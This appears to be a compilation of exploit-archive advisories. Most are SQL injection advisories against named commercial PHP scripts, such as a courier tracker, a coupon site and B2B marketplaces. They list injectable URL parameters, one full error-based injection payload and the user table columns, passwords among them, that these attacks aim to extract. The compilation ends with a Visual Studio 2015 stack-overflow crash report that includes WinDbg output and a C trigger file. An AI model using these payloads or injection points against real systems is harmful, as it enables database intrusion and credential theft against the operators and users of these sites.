# http://localhost/[PATH]/ajaxglobalfunc.php?func=flag&vid_id=[SQL]
# http://localhost/[PATH]/ajaxplay.php?vidid=[SQL]
# # # # #
HireHackking 
# # # # #
# Exploit Title: Adult Tube Video Script - SQL Injection
# Google Dork: N/A
# Date: 25.03.2017
# Vendor Homepage: http://www.boysofts.com/
# Software: http://www3.boysofts.com/xxx/freeadultvideotubescript.zip
# Demo: http://www.boysofts.com/2013/12/free-adult-tube-video-script.html
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/single-video.php?video_id=[SQL]
# http://localhost/[PATH]/search.php?page=[SQL]
# single-video.php?video_id=25404991'+And(SelecT+1+FroM+(SelecT+CoUnT(*),ConCAT((SelecT(SelecT+ConCAT(CAST(DatabasE()+As+ChAr),0x7e,0x496873616e2053656e63616e))+FroM+information_schema.tables+WhErE+table_schema=DatabasE()+LImIt+0,1),FLooR(RanD(0)*2))x+FroM+information_schema.tables+GrOuP+By+x)a)++and+'userip'='userip
# # # # #
HireHackking 
# # # # #
# Exploit Title: Alibaba Clone Script - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: http://b2bbusinessdirectoryscript.com/alibaba-clone-script.html
# Demo: http://thealidemox.com
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/ajax.php?section=count_classified&cl_id=[SQL]
# http://localhost/[PATH]/ajax.php?section=count_tradeleade&cl_id=[SQL]
# http://localhost/[PATH]/ajax.php?section=count_product&pro_id=[SQL]
# Etc...
# # # # #
HireHackking 
# # # # #
# Exploit Title: B2B Marketplace Script v2.0 - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: http://eaglescripts.com/php-b2b-marketplace-script-v2
# Demo: http://demob2b.xyz/
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/ajax.php?section=count_classified&cl_id=[SQL]
# http://localhost/[PATH]/ajax.php?section=count_tradeleade&cl_id=[SQL]
# http://localhost/[PATH]/ajax.php?section=count_product&pro_id=[SQL]
# Etc...
# # # # #
HireHackking 
# # # # #
# Exploit Title: Real Estate Property Pro Script - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: http://www.eaglescripts.com/php-property-portal-script
# Demo: http://realpro.phpscriptsdemo.com/
# Version: Pro
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/adsearch.html?&prc_min=[SQL]&prc_max=[SQL]
# Etc...
# # # # #
HireHackking 
# # # # #
# Exploit Title: Courier Tracking Software v6.0 - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: http://www.eaglescripts.com/courier-tracking-software-ver-6
# Demo: http://courierv6.couriersoftwares.com/
# Version: 6.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/eaglecov6.php?c=other&f=show_news_details&view_id=[SQL]
# http://localhost/[PATH]/eaglecov6.php?c=homepage&f=services&ser_id=[SQL]
# user:username
# user:hub_name
# user:password
# user:hidden_pass
# user:entrydate
# user:onlinestatus
# user:status
# Etc...
# # # # #
HireHackking 
# # # # #
# Exploit Title: Parcel Delivery Booking Script v1.0 - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: http://www.eaglescripts.com/parcel-delivery-booking-script
# Demo: http://parceldelivery.phpscriptsdemo.com/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/add_booking_shipment_first_step/1/1/1/1[SQL]
# Etc...
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Professional Bus Booking Script - SQL Injection
# Google Dork: N/A
# Date: 27.03.2017
# Vendor Homepage: http://travelbookingscript.com/
# Software: http://travelbookingscript.com/professional-bus-booking-script.html
# Demo: http://travelbookingscript.com/demo/professional/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
# # # # #
HireHackking 
# # # # #
# Exploit Title: CouponPHP Script v3.1 - SQL Injection
# Google Dork: N/A
# Date: 27.03.2017
# Vendor Homepage: http://couponphp.com/
# Software: http://couponphp.com/demos
# Demo: http://newdemo2.couponphp.com
# Demo: http://newdemo3.couponphp.com
# Version: 3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/go.php?coupon_id=1&code=[SQL]
# users
#  id
#  username
#  password
# # # # #
HireHackking 
/*
# Exploit Title: Microsoft Visual Studio 2015 update 3 – Stack overflow
# Date: 2017-03-26
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: https://www.visualstudio.com/thank-you-downloading-visual-studio/?sku=Community&rel=15
# Version: Visual Studio 2015 update 3
# Tested on: Windows 7 Pro SP1 x64, Windows 10 Pro x64

 

Windbg output

 

Crash 1:

 

eax=1469f040 ebx=00000000 ecx=1469f040 edx=165f4634 esi=1469f040 edi=0036e2d8

eip=16610c9d esp=00279000 ebp=0027900c iopl=0         nv up ei pl zr na pe nc

cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246

 

VCProject!CVCNode::GetVCProject+0x49:

 

16610c9d ff523c          call    dword ptr [edx+3Ch]  ds:002b:165f4670={VCProject!CVCNode::GetVCProject (16610c64)}

 

 

0:000> !exchain

0036e2dc: VCProject!memcmp+86f5 (166956e8)

0036e30c: VCProject!memcmp+876b (166957b0)

0036e384: msenv!_aulldiv+476d1 (31e3d818)

0036e424: msenv!_aulldiv+1567e (31df2c66)

0036e478: msenv!_aulldiv+65abf (31e6a010)

0036e4c4: vcpkg!sqlite3_value_type+1f3a (3940ac50)

0036e530: msenv!_aulldiv+2b169 (31e135dc)

0036e578: msenv!_aulldiv+2bb07 (31e145ac)

0036e5cc: msenv!_aulldiv+2b1de (31e136ca)

 

0:000> k

# ChildEBP RetAddr 

00 0027900c 16610ca0 VCProject!CVCNode::GetVCProject+0x49

01 00279020 16610ca0 VCProject!CVCNode::GetVCProject+0x53

02 00279034 16610ca0 VCProject!CVCNode::GetVCProject+0x53

…

ff 00279034 16610ca0 VCProject!CVCNode::GetVCProject+0x53

 

 

 

Crash 2:

 

(10cc.1970): CLR exception - code e0434352 (first chance)

 

(10cc.1970): Stack overflow - code c00000fd (first chance)

 

eax=08675cf0 ebx=00000000 ecx=08675cf0 edx=39784634 esi=08675cf0 edi=0043e0f0

eip=397a0c68 esp=00349000 ebp=00349004 iopl=0         nv up ei pl zr na pe nc

cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246

 

VCProject!CVCNode::GetVCProject+0x4:

397a0c68 57              push    edi

 

0:000> !exchain

0043e0f4: VCProject!memcmp+86f5 (398256e8)

0043e124: VCProject!memcmp+876b (398257b0)

0043e19c: msenv!_aulldiv+476d1 (51e1d818)

0043e23c: msenv!_aulldiv+1567e (51dd2c66)

0043e290: msenv!_aulldiv+65abf (51e4a010)

0043e2dc: vcpkg!sqlite3_value_type+1f3a (390bac50)

0043e348: msenv!_aulldiv+2b169 (51df35dc)

0043e390: msenv!_aulldiv+2bb07 (51df45ac)

0043e3e4: msenv!_aulldiv+2b1de (51df36ca)

 

15a0a150  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

15a0a151  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

15a0a152  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

15a0a153  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

15a0a154  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

15a0a155  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

15a0a156  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

15a0a157  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

 

 

Peter

 

crash.c
*/

// Exploit Title : Microsoft Visual Studio 2015 update 3 – Stack overflow
// Date : 2017 - 03 - 26
// Exploit Author : Peter Baris
// Vendor Homepage : http://www.saptech-erp.com.au
// Software Link : https://www.visualstudio.com/thank-you-downloading-visual-studio/?sku=Community&rel=15
// Version : 2015 update 3
// Tested on : Windows 7 Pro SP1 x64, Windows 10 Pro x64

// 2017-03-05 Reported to Microsoft
// a few ignorant messages from microsoft, stating that this is not causing data loss
// I have sent explanation about ctrl-s key combination
// 2017-03-26 Publishing


// Procedure to trigger the vulnerability
// Open the c source file simply by double clicing it
// In the properties windows change "Included In Project" to False -> click back to your source code's window

#include <Windows.h>

int main()
{

	printf("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
}